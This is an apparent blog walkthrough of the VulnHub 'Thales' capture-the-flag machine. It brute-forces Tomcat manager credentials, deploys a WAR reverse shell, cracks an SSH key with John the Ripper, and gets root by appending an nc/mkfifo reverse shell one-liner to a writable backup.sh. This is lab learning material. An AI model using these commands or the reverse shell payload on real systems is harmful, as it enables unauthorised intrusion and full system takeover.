Hi guys, we have another vulnerable machine to exploit. Link for the machine — https://www.vulnhub.com/entry/thales-1,749/. The description for the machine is: “Open your eyes and change your perspective”

First and foremost, we need to get the IP of our vulnerable machine.

**sudo netdiscover -r 10.10.10.1/24 -i eth0**

Great, we’ve obtained our IP. Now, let’s conduct some reconnaissance and uncover what lies ahead.

We got two open ports; port 22(SSH) and port 8080(web server). We can see port 8080 has Apache Tomcat 9.0.52 running. Let’s take a look at the website first. Looks like the landing page for Apache Tomcat.

We now need to launch gobuster. When the command is executed, gobuster will perform a directory and file brute-force attack on the specified target web server, searching for files with the specified extensions. This can help to identify files and directories that may not be discovered using a general wordlist.

**gobuster dir -u** **http://10.10.10.12:8080/** **-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt.php**

We got some directories but there wasn’t anything important🥱. We move to another important tool Metasploit Framework😏, we launch the tool by typing msfconsole. We will be using auxiliary/scanner/http/tomcat_mgr_login, make sure you set the parameters and it should look something like this:

We get a successful login as seen below. Now let’s go back to the site and try and login with Username: tomcat and Password: role1.

As seen above we were able to login with the credentials we got from msfconsole. We now need to use hacktricks to help craft a tomcat war payload which can be deployed below;

We copy the hacktricks reverse shell and edit according to our preference as below;

Now we need to go back to our website and upload our payload and deploy it. After which we start netcat to capture the session.

We use curl command pointing to the reverse payload and instigate a session which was captured by our netcat listener. We now need to check around for anything interesting.

**python3 -c ‘import pty;pty.spawn(“/bin/bash”)’**

We use python3 to spawn a fully interactive shell which can be seen above. While snooping around we found an id_rsa key which can be seen below, lets try and see if we can get the password.

We need to prepare our file for John the Ripper, which is a password cracking tool.

**/usr/share/john/ssh2john.py id_rsa > break.txt**

After which our file is ready and should look like this;

Now our file is ready for John the Ripper. Once we run the tool, we crack the password and can be seen below;

**john — wordlist=/usr/share/wordlists/rockyou.txt break.txt**

We try the password we got to upgrade our shell to Thales user, which works;

We find a note left for us with a very interesting message🤔Let’s see how true the message is.

Next, we will examine the backup.sh file to determine its properties. Upon investigation, we discover that the file has been granted read, write, and execute privileges, and it is under the ownership of the root user.

The backup.sh looks as below;

As the backup.sh file is modifiable, we have the potential to modify the script by incorporating a reverse shell payload, with the aim of achieving privileged access to the root shell.

Get Kevin Mwenda’s stories in your inbox

Join Medium for free to get updates from this writer.

We now head to pentestmonkey whereby we get a malicious payload which we can use to get a revrse shell payload.

**echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.8 4242 >/tmp/f” >> backup.sh**

Finally we get a root shell🥳

As seen above we captured the flag, this was an easy but fun machine. See you in the next one🫡

THALES

Get Kevin Mwenda’s stories in your inbox